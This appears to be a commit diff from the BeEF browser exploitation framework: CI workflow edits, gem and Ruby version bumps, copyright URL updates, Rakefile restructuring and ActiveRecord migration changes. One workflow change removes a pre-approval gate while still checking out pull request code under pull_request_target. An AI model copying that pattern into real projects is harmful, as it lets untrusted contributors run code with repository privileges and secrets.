Revert "Add enable auto merge to dependabot yml"

Add enable auto merge to dependabot yml

.github/workflows/dependabot-auto-merge.yml

@@ -0,0 +1,26 @@
+name: Dependabot auto-merge
+on: 
+  pull_request:
+    branches:
+        - master
+
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  dependabot:
+    runs-on: ubuntu-latest
+    if: github.event.pull_request.user.login == 'dependabot[bot]' && github.repository == 'beefproject/beef'
+    steps:
+      - name: Dependabot metadata
+        id: metadata
+        uses: dependabot/fetch-metadata@v2
+        with:
+          github-token: "${{ secrets.GITHUB_TOKEN }}"
+      - name: Enable auto-merge for Dependabot PRs
+        if: success() && (steps.metadata.outputs.update-type == 'version-update:semver-minor' || steps.metadata.outputs.update-type == 'version-update:semver-patch')
+        run: gh pr merge --auto --merge "$PR_URL"
+        env:
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.github/workflows/github_actions.yml

@@ -4,14 +4,7 @@ on:
   pull_request_target:
     branches: [ master ]
       
-jobs:
-  approve:
-    runs-on: ubuntu-latest
-
-    steps:
-    - name: Approve
-      run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
-      
+jobs:    
   ubuntu-job:
     name: 'BrowserStack Test on Ubuntu'
     runs-on: ubuntu-latest  # Can be self-hosted runner also
@@ -34,17 +27,16 @@ jobs:
           local-identifier: random
 
       - name: 'Checkout the repository'
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
         with:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 2
 
       - name: 'Setting up Ruby'
         uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: 3.0.3 # Not needed with a .ruby-version file
+        # Ruby version is defined in .ruby-version file
 
-      - name: 'Update and Install Dwpendencies'
+      - name: 'Update and Install Dependencies'
         run: |
           sudo apt update
           sudo apt install libcurl4 libcurl4-openssl-dev

.github/workflows/stale.yml

@@ -21,10 +21,10 @@ jobs:
     - uses: actions/stale@v5
       with:
         repo-token: ${{ secrets.GITHUB_TOKEN }}
-        days-before-stale: 7
-        days-before-pr-stale: 14
-        days-before-close: 7
-        days-before-pr-close: 14
+        days-before-stale: 14
+        days-before-pr-stale: 29
+        days-before-close: 11
+        days-before-pr-close: 31
         stale-issue-message: 'This issue as been marked as stale due to inactivity and will be closed in 7 days'
         stale-pr-message: 'Stale pull request message'
         stale-issue-label: 'Stale'

.gitignore

@@ -1,5 +1,7 @@
 ### BeEF ###
 beef.db
+beef.db-shm
+beef.db-wal
 beef.log
 test/msf-test
 extensions/admin_ui/media/javascript-min/
@@ -25,6 +27,9 @@ coverage/
 # BrowserStack
 local.log
 
+# Visual Studio Code
+.vscode/
+
 # The following lines were created by https://www.gitignore.io
 
 ### Linux ###

.ruby-version

@@ -1 +1 @@
-3.0.3
+3.2.2

Dockerfile

@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 ###########################################################################################################
 ###########################################################################################################
 ##                                                                                                       ##

Gemfile

@@ -1,31 +1,30 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-#gem 'simplecov', require: false, group: :test
 
 gem 'net-smtp', require: false
 gem 'json'
 
 gem 'eventmachine', '~> 1.2', '>= 1.2.7'
 gem 'thin', '~> 1.8'
-gem 'sinatra', '~> 3.0'
+gem 'sinatra', '~> 3.2'
 gem 'rack', '~> 2.2'
-gem 'rack-protection', '~> 3.0.5'
+gem 'rack-protection', '~> 3.2.0'
 gem 'em-websocket', '~> 0.5.3' # WebSocket support
 gem 'uglifier', '~> 4.2'
-gem 'mime-types', '~> 3.4', '>= 3.4.1'
-gem 'execjs', '~> 2.9'
+gem 'mime-types', '~> 3.6'
+gem 'execjs', '~> 2.10'
 gem 'ansi', '~> 1.5'
 gem 'term-ansicolor', :require => 'term/ansicolor'
 gem 'rubyzip', '~> 2.3'
 gem 'espeak-ruby', '~> 1.1.0' # Text-to-Voice
-gem 'rake', '~> 13.1'
-# gem 'otr-activerecord', '~> 2.1', '>= 2.1.2'
-gem 'otr-activerecord', '= 2.1.2'
-gem 'sqlite3', '~> 1.6'
-gem 'rubocop', '~> 1.59.0', require: false
+gem 'rake', '~> 13.2'
+gem 'activerecord', '~> 7.2' 
+gem 'otr-activerecord', '~> 2.4.0'
+gem 'sqlite3', '~> 2.2'
+gem 'rubocop', '~> 1.68.0', require: false
 
 # Geolocation support
 group :geoip do
@@ -52,7 +51,7 @@ end
 # DNS extension
 group :ext_dns do
   gem 'async-dns', '~> 1.3'
-  gem 'async', '~> 1.31'
+  gem 'async', '~> 1.32'
 end
 
 # QRcode extension
@@ -63,29 +62,29 @@ end
 # For running unit tests
 group :test do
     gem 'test-unit-full', '~> 0.0.5'
-    gem 'rspec', '~> 3.12'
-    gem 'rdoc', '~> 6.6'
+    gem 'rspec', '~> 3.13'
+    gem 'rdoc', '~> 6.7'
     gem 'browserstack-local', '~> 1.4'
 
-    gem 'irb', '~> 1.11'
+    gem 'irb', '~> 1.14'
     gem 'pry-byebug', '~> 3.10', '>= 3.10.1'
 
     gem 'rest-client', '~> 2.1.0'
     gem 'websocket-client-simple', '~> 0.6.1'
 
-    # curb gem requires curl libraries
+    # Note: curb gem requires curl libraries
     # sudo apt-get install libcurl4-openssl-dev
     gem 'curb', '~> 1.0', '>= 1.0.5'
 
-    # selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
+    # Note: selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
     # gem 'selenium' # Requires old version of selenium which is no longer available
     gem 'geckodriver-helper', '~> 0.24.0'
-    gem 'selenium-webdriver', '~> 4.16'
+    gem 'selenium-webdriver', '~> 4.26'
 
-    # nokogiri is needed by capybara which may require one of the below commands
+    # Note: nokogiri is needed by capybara which may require one of the below commands
     # sudo apt-get install libxslt-dev libxml2-dev
     # sudo port install libxml2 libxslt
-    gem 'capybara', '~> 3.39'
+    gem 'capybara', '~> 3.40'
 end
 
 source 'https://rubygems.org'

Gemfile.lock

@@ -1,50 +1,64 @@
 GEM
   remote: https://rubygems.org/
   specs:
-    activemodel (7.0.4.3)
-      activesupport (= 7.0.4.3)
-    activerecord (7.0.4.3)
-      activemodel (= 7.0.4.3)
-      activesupport (= 7.0.4.3)
-    activesupport (7.0.4.3)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
+    activemodel (7.2.2)
+      activesupport (= 7.2.2)
+    activerecord (7.2.2)
+      activemodel (= 7.2.2)
+      activesupport (= 7.2.2)
+      timeout (>= 0.4.0)
+    activesupport (7.2.2)
+      base64
+      benchmark (>= 0.3)
+      bigdecimal
+      concurrent-ruby (~> 1.0, >= 1.3.1)
+      connection_pool (>= 2.2.5)
+      drb
       i18n (>= 1.6, < 2)
+      logger (>= 1.4.2)
       minitest (>= 5.1)
-      tzinfo (~> 2.0)
-    addressable (2.8.4)
-      public_suffix (>= 2.0.2, < 6.0)
+      securerandom (>= 0.3)
+      tzinfo (~> 2.0, >= 2.0.5)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
     ansi (1.5.0)
     archive-zip (0.12.0)
       io-like (~> 0.3.0)
     ast (2.4.2)
-    async (1.31.0)
+    async (1.32.1)
       console (~> 1.10)
       nio4r (~> 2.3)
       timers (~> 4.1)
     async-dns (1.3.0)
       async-io (~> 1.15)
-    async-io (1.34.3)
+    async-io (1.43.2)
       async
+    base64 (0.2.0)
+    benchmark (0.3.0)
+    bigdecimal (3.1.8)
     browserstack-local (1.4.3)
     byebug (11.1.3)
-    capybara (3.39.2)
+    capybara (3.40.0)
       addressable
       matrix
       mini_mime (>= 0.1.3)
-      nokogiri (~> 1.8)
+      nokogiri (~> 1.11)
       rack (>= 1.6.0)
       rack-test (>= 0.6.3)
       regexp_parser (>= 1.5, < 3.0)
       xpath (~> 3.2)
     coderay (1.1.3)
-    concurrent-ruby (1.2.2)
-    console (1.16.2)
-      fiber-local
-    curb (1.0.5)
+    concurrent-ruby (1.3.4)
+    connection_pool (2.4.1)
+    console (1.27.0)
+      fiber-annotation
+      fiber-local (~> 1.1)
+      json
+    curb (1.0.6)
     daemons (1.4.1)
-    diff-lcs (1.5.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    diff-lcs (1.5.1)
+    domain_name (0.6.20240107)
+    drb (2.2.1)
     em-websocket (0.5.3)
       eventmachine (>= 0.12.9)
       http_parser.rb (~> 0)
@@ -52,59 +66,72 @@ GEM
     espeak-ruby (1.1.0)
     event_emitter (0.2.6)
     eventmachine (1.2.7)
-    execjs (2.9.1)
-    fiber-local (1.0.0)
+    execjs (2.10.0)
+    fiber-annotation (0.2.0)
+    fiber-local (1.1.0)
+      fiber-storage
+    fiber-storage (1.0.0)
     geckodriver-helper (0.24.0)
       archive-zip (~> 0.7)
     hashie (5.0.0)
     hashie-forbidden_attributes (0.1.1)
       hashie (>= 3.0)
     http-accept (1.7.0)
-    http-cookie (1.0.5)
+    http-cookie (1.0.7)
       domain_name (~> 0.5)
     http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.6)
       concurrent-ruby (~> 1.0)
-    io-console (0.7.1)
+    io-console (0.7.2)
     io-like (0.3.1)
-    irb (1.11.0)
-      rdoc
-      reline (>= 0.3.8)
-    json (2.6.3)
+    irb (1.14.1)
+      rdoc (>= 4.0.0)
+      reline (>= 0.4.2)
+    json (2.8.1)
     language_server-protocol (3.17.0.3)
+    logger (1.6.1)
     matrix (0.4.2)
     maxmind-db (1.2.0)
-    method_source (1.0.0)
-    mime-types (3.4.1)
+    method_source (1.1.0)
+    mime-types (3.6.0)
+      logger
       mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.0218.1)
-    mini_mime (1.1.2)
-    minitest (5.18.0)
-    mojo_magick (0.6.7)
+    mime-types-data (3.2024.1001)
+    mini_mime (1.1.5)
+    minitest (5.25.1)
+    mojo_magick (0.6.8)
     msfrpc-client (1.1.2)
       msgpack (~> 1)
-    msgpack (1.6.1)
-    mustermann (3.0.0)
+    msgpack (1.7.3)
+    mustermann (3.0.3)
       ruby2_keywords (~> 0.0.1)
-    net-protocol (0.2.1)
+    net-protocol (0.2.2)
       timeout
-    net-smtp (0.4.0)
+    net-smtp (0.5.0)
       net-protocol
     netrc (0.11.0)
-    nio4r (2.5.8)
-    nokogiri (1.15.2-arm64-darwin)
+    nio4r (2.7.4)
+    nokogiri (1.16.7-aarch64-linux)
       racc (~> 1.4)
-    nokogiri (1.15.2-x86_64-linux)
+    nokogiri (1.16.7-arm-linux)
       racc (~> 1.4)
-    otr-activerecord (2.1.2)
-      activerecord (>= 4.0, < 7.1)
+    nokogiri (1.16.7-arm64-darwin)
+      racc (~> 1.4)
+    nokogiri (1.16.7-x86-linux)
+      racc (~> 1.4)
+    nokogiri (1.16.7-x86_64-darwin)
+      racc (~> 1.4)
+    nokogiri (1.16.7-x86_64-linux)
+      racc (~> 1.4)
+    otr-activerecord (2.4.0)
+      activerecord (>= 6.0, < 7.3)
       hashie-forbidden_attributes (~> 0.1)
-    parallel (1.24.0)
+    parallel (1.26.3)
     parseconfig (1.1.2)
-    parser (3.2.2.4)
+    parser (3.3.5.1)
       ast (~> 2.4.1)
       racc
-    power_assert (2.0.3)
+    power_assert (2.0.4)
     pry (0.14.2)
       coderay (~> 1.1)
       method_source (~> 1.0)
@@ -113,80 +140,87 @@ GEM
       pry (>= 0.13, < 0.15)
     psych (5.1.2)
       stringio
-    public_suffix (5.0.1)
-    qr4r (0.6.1)
+    public_suffix (6.0.1)
+    qr4r (0.6.2)
       mojo_magick (~> 0.6.5)
-      rqrcode_core (~> 0.1)
-    racc (1.7.3)
-    rack (2.2.7)
-    rack-protection (3.0.6)
-      rack
+      rqrcode_core (~> 1.0)
+    racc (1.8.1)
+    rack (2.2.10)
+    rack-protection (3.2.0)
+      base64 (>= 0.1.0)
+      rack (~> 2.2, >= 2.2.4)
     rack-test (2.1.0)
       rack (>= 1.3)
     rainbow (3.1.1)
-    rake (13.1.0)
-    rdoc (6.6.2)
+    rake (13.2.1)
+    rdoc (6.7.0)
       psych (>= 4.0.0)
-    regexp_parser (2.8.3)
-    reline (0.4.1)
+    regexp_parser (2.9.2)
+    reline (0.5.10)
       io-console (~> 0.5)
     rest-client (2.1.0)
       http-accept (>= 1.7.0, < 2.0)
       http-cookie (>= 1.0.2, < 2.0)
       mime-types (>= 1.16, < 4.0)
       netrc (~> 0.8)
-    rexml (3.2.6)
-    rqrcode_core (0.2.0)
-    rr (3.1.0)
-    rspec (3.12.0)
-      rspec-core (~> 3.12.0)
-      rspec-expectations (~> 3.12.0)
-      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.1)
-      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.2)
+    rexml (3.3.9)
+    rqrcode_core (1.2.0)
+    rr (3.1.1)
+    rspec (3.13.0)
+      rspec-core (~> 3.13.0)
+      rspec-expectations (~> 3.13.0)
+      rspec-mocks (~> 3.13.0)
+    rspec-core (3.13.2)
+      rspec-support (~> 3.13.0)
+    rspec-expectations (3.13.3)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.4)
+      rspec-support (~> 3.13.0)
+    rspec-mocks (3.13.2)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-support (3.12.0)
-    rubocop (1.59.0)
+      rspec-support (~> 3.13.0)
+    rspec-support (3.13.1)
+    rubocop (1.68.0)
       json (~> 2.3)
       language_server-protocol (>= 3.17.0)
       parallel (~> 1.10)
-      parser (>= 3.2.2.4)
+      parser (>= 3.3.0.2)
       rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.30.0, < 2.0)
+      regexp_parser (>= 2.4, < 3.0)
+      rubocop-ast (>= 1.32.2, < 2.0)
       ruby-progressbar (~> 1.7)
       unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.30.0)
-      parser (>= 3.2.1.0)
+    rubocop-ast (1.33.1)
+      parser (>= 3.3.1.0)
     ruby-progressbar (1.13.0)
     ruby2_keywords (0.0.5)
     rubyzip (2.3.2)
     rushover (0.3.0)
       json
       rest-client
-    selenium-webdriver (4.16.0)
+    securerandom (0.3.1)
+    selenium-webdriver (4.26.0)
+      base64 (~> 0.2)
+      logger (~> 1.4)
       rexml (~> 3.2, >= 3.2.5)
       rubyzip (>= 1.2.2, < 3.0)
       websocket (~> 1.0)
-    sinatra (3.0.6)
+    sinatra (3.2.0)
       mustermann (~> 3.0)
       rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.6)
+      rack-protection (= 3.2.0)
       tilt (~> 2.0)
     slack-notifier (2.4.0)
-    sqlite3 (1.6.9-arm64-darwin)
-    sqlite3 (1.6.9-x86_64-linux)
-    stringio (3.1.0)
+    sqlite3 (2.2.0-aarch64-linux-gnu)
+    sqlite3 (2.2.0-arm-linux-gnu)
+    sqlite3 (2.2.0-arm64-darwin)
+    sqlite3 (2.2.0-x86-linux-gnu)
+    sqlite3 (2.2.0-x86_64-darwin)
+    sqlite3 (2.2.0-x86_64-linux-gnu)
+    stringio (3.1.1)
     sync (0.5.0)
-    term-ansicolor (1.7.1)
+    term-ansicolor (1.11.2)
       tins (~> 1.0)
-    test-unit (3.5.7)
+    test-unit (3.6.2)
       power_assert
     test-unit-context (0.5.1)
       test-unit (>= 2.4.0)
@@ -207,21 +241,19 @@ GEM
       daemons (~> 1.0, >= 1.0.9)
       eventmachine (~> 1.0, >= 1.0.4)
       rack (>= 1, < 3)
-    tilt (2.1.0)
-    timeout (0.4.0)
+    tilt (2.4.0)
+    timeout (0.4.1)
     timers (4.3.5)
-    tins (1.32.1)
+    tins (1.37.0)
+      bigdecimal
       sync
     tzinfo (2.0.6)
       concurrent-ruby (~> 1.0)
-    uglifier (4.2.0)
+    uglifier (4.2.1)
       execjs (>= 0.3.0, < 3)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
-    unicode-display_width (2.5.0)
-    webrick (1.8.1)
-    websocket (1.2.10)
+    unicode-display_width (2.6.0)
+    webrick (1.9.0)
+    websocket (1.2.11)
     websocket-client-simple (0.6.1)
       event_emitter
       websocket
@@ -231,45 +263,50 @@ GEM
       nokogiri (~> 1.8)
 
 PLATFORMS
-  arm64-darwin-22
+  aarch64-linux
+  arm-linux
+  arm64-darwin
+  x86-linux
+  x86_64-darwin
   x86_64-linux
 
 DEPENDENCIES
+  activerecord (~> 7.2)
   ansi (~> 1.5)
-  async (~> 1.31)
+  async (~> 1.32)
   async-dns (~> 1.3)
   browserstack-local (~> 1.4)
-  capybara (~> 3.39)
+  capybara (~> 3.40)
   curb (~> 1.0, >= 1.0.5)
   em-websocket (~> 0.5.3)
   erubis (~> 2.7)
   espeak-ruby (~> 1.1.0)
   eventmachine (~> 1.2, >= 1.2.7)
-  execjs (~> 2.9)
+  execjs (~> 2.10)
   geckodriver-helper (~> 0.24.0)
-  irb (~> 1.11)
+  irb (~> 1.14)
   json
   maxmind-db (~> 1.2)
-  mime-types (~> 3.4, >= 3.4.1)
+  mime-types (~> 3.6)
   msfrpc-client (~> 1.1, >= 1.1.2)
   net-smtp
-  otr-activerecord (= 2.1.2)
+  otr-activerecord (~> 2.4.0)
   parseconfig (~> 1.1, >= 1.1.2)
   pry-byebug (~> 3.10, >= 3.10.1)
   qr4r (~> 0.6.1)
   rack (~> 2.2)
-  rack-protection (~> 3.0.5)
-  rake (~> 13.0)
-  rdoc (~> 6.5)
+  rack-protection (~> 3.2.0)
+  rake (~> 13.2)
+  rdoc (~> 6.7)
   rest-client (~> 2.1.0)
-  rspec (~> 3.12)
-  rubocop (~> 1.59.0)
+  rspec (~> 3.13)
+  rubocop (~> 1.68.0)
   rubyzip (~> 2.3)
   rushover (~> 0.3.0)
-  selenium-webdriver (~> 4.16)
-  sinatra (~> 3.0)
+  selenium-webdriver (~> 4.26)
+  sinatra (~> 3.2)
   slack-notifier (~> 2.4)
-  sqlite3 (~> 1.6)
+  sqlite3 (~> 2.2)
   term-ansicolor
   test-unit-full (~> 0.0.5)
   thin (~> 1.8)
@@ -278,4 +315,4 @@ DEPENDENCIES
   xmlrpc (~> 0.3.3)
 
 BUNDLED WITH
-   2.4.8
+   2.5.18

INSTALL.txt

@@ -1,7 +1,7 @@
 ===============================================================================
    
     Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    Browser Exploitation Framework (BeEF) - https://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================

README.md

@@ -1,7 +1,7 @@
 ===============================================================================
 
     Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    Browser Exploitation Framework (BeEF) - https://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================

Rakefile

@@ -1,28 +1,27 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-require 'yaml'
-require 'bundler/setup'
-load 'tasks/otr-activerecord.rake'
-#require 'pry-byebug'
-
-
-task :default => ["spec"]
-
-desc 'Generate API documentation to doc/rdocs/index.html'
-task :rdoc do
-  Rake::Task['rdoc:rerdoc'].invoke
-end
-
-## RSPEC
 require 'rspec/core/rake_task'
 
-RSpec::Core::RakeTask.new(:spec) do |task|
+task :default => ["short"]
+
+RSpec::Core::RakeTask.new(:short) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack', '--tag ~run_on_long_tests']
+end
+
+RSpec::Core::RakeTask.new(:long) do |task|
   task.rspec_opts = ['--tag ~run_on_browserstack']
 end
 
+RSpec::Core::RakeTask.new(:long_only) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack', '--tag run_on_long_tests']
+end
+
+################################
+# Browserstack
+
 RSpec::Core::RakeTask.new(:browserstack) do |task|
   task.rspec_opts = ['--tag run_on_browserstack']
 end
@@ -55,7 +54,7 @@ namespace :ssl do
     end
     Rake::Task['ssl:replace'].invoke
   end
-
+  
   desc 'Re-generate SSL certificate'
   task :replace do
     if File.file?('/usr/local/bin/openssl')
@@ -70,6 +69,14 @@ namespace :ssl do
   end
 end
 
+################################
+# Generate API documentation
+
+desc 'Generate API documentation to doc/rdocs/index.html'
+task :rdoc do
+  Rake::Task['rdoc:rerdoc'].invoke
+end
+
 ################################
 # rdoc
 
@@ -115,7 +122,6 @@ end
 @beef_process_id = nil;
 @beef_config_file = 'tmp/rk_beef_conf.yaml';
 
-
 task :beef_start => 'beef' do
   # read environment param for creds or use bad_fred
   test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
@@ -190,24 +196,6 @@ file '/tmp/msf-test/msfconsole' do
   sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
 end
 
-
-################################
-# Create Mac DMG File
-
-task :dmg do
-  puts "\nCreating Working Directory\n";
-  sh "mkdir dmg";
-  sh "mkdir dmg/BeEF";
-  sh "rsync * dmg/BeEF --exclude=dmg -r";
-  sh "ln -s /Applications dmg/";
-  puts "\nCreating DMG File\n"
-  sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
-  puts "\nCleaning Up\n"
-  sh "rm -r dmg";
-  puts "\nBeEF.dmg created\n"
-end
-
-
 ################################
 # ActiveRecord
 namespace :db do

VERSION

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

beef

@@ -2,7 +2,7 @@
 
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -194,7 +194,6 @@ end
 
 # Connect to DB
 ActiveRecord::Base.logger = nil
-OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
 OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
 # otr-activerecord require you to manually establish the connection with the following line
 #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
@@ -203,10 +202,13 @@ if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
 end
 
 # Migrate (if required)
-context = ActiveRecord::Migration.new.migration_context
+ActiveRecord::Migration.verbose = false # silence activerecord migration stdout messages
+ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
+context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths)
 if context.needs_migration?
-  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
+  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate
 end
+
 #
 # @note Extensions may take a moment to load, thus we print out a please wait message
 #
@@ -242,6 +244,8 @@ BeEF::Core::Console::Banners.print_loaded_extensions
 BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes
+BeEF::Core::Console::Banners.print_http_proxy
+BeEF::Core::Console::Banners.print_dns
 
 #
 # @note Prints the API key needed to use the RESTful API

config.yaml

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
@@ -146,6 +146,6 @@ beef:
         metasploit:
             enable: false
         social_engineering:
-            enable: true
+            enable: false
         xssrays:
             enable: true

core/api.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/api/extension.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/api/extensions.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/configuration.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/migration.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/network_stack/assethandler.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/server.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/server/hook.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/module.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/modules.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/bootstrap.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/core.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/extension.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/extensions.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/base.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/browser.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -46,7 +46,7 @@ module BeEF
       return false if has_non_printable_char?(str)
       return true if str.eql? 'UNKNOWN'
       return true if str.eql? 'ALL'
